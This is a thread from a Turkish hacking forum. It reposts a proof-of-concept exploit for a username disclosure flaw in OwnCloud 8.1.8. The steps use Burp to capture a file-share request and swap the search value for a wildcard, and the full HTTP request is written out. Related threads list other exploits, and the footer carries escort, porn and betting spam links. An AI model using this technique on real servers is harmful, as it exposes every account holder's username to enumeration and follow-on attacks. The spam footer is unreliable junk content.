[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

OwnCloud 8.1.8 - Username Disclosure Vulnerability

#1
OwnCloud 8.1.8 - Username Disclosure Vulnerability

Kod:
# Exploit Title: OwnCloud 8.1.8 - Username Disclosure
# Exploit Author : Daniel Moreno
# Vendor Homepage :  https://owncloud.org/  
# Link Software :  https://ftp.icm.edu.pl/packages/owncloud/  (old version. Download at your own risk)
# Tested on OS: CentOS

# PoC:
# 1. Create an account in OwnCloud
# 2. Intercept connection with Burp
# 3. Share a file, typing anything

---------------------------------------------------------
4. Burp will capture this request

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file
HTTP/1.1
Host: XXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
requesttoken: XXXXXXXXXXXXXXXXXXX
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://domain.com/index.php/apps/files/
Cookie: XXXXXXXXXXXXXXXX
---------------------------------------------------------------------

5. Send to Repeater

6. Change GET parameter to THIS:

GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file
HTTP/1.1


7. Return valeus will be a JSON with all username informations

#  0day.today [2019-12-04]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Savsoft Quiz 5 - Persistent Cross-Site Scripting Vulnerability 0bir 0 10 07-09-2020, 10:47 PM
Son Mesaj: 0bir
  Webtareas 2.1 / 2.1p File Upload / Information Disclosure Vulnerabilities 0bir 0 4 07-09-2020, 10:47 PM
Son Mesaj: 0bir
  SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) Vulnerability 0bir 0 6 07-09-2020, 10:46 PM
Son Mesaj: 0bir
  BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password) Vulnerability 0bir 0 7 07-09-2020, 10:46 PM
Son Mesaj: 0bir
  BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation Vulnerability 0bir 0 7 07-09-2020, 10:45 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort En iyi bahis siteleri porno beylikdüzü escort avcılar escort eskişehir escort porno cami halısı taksim escort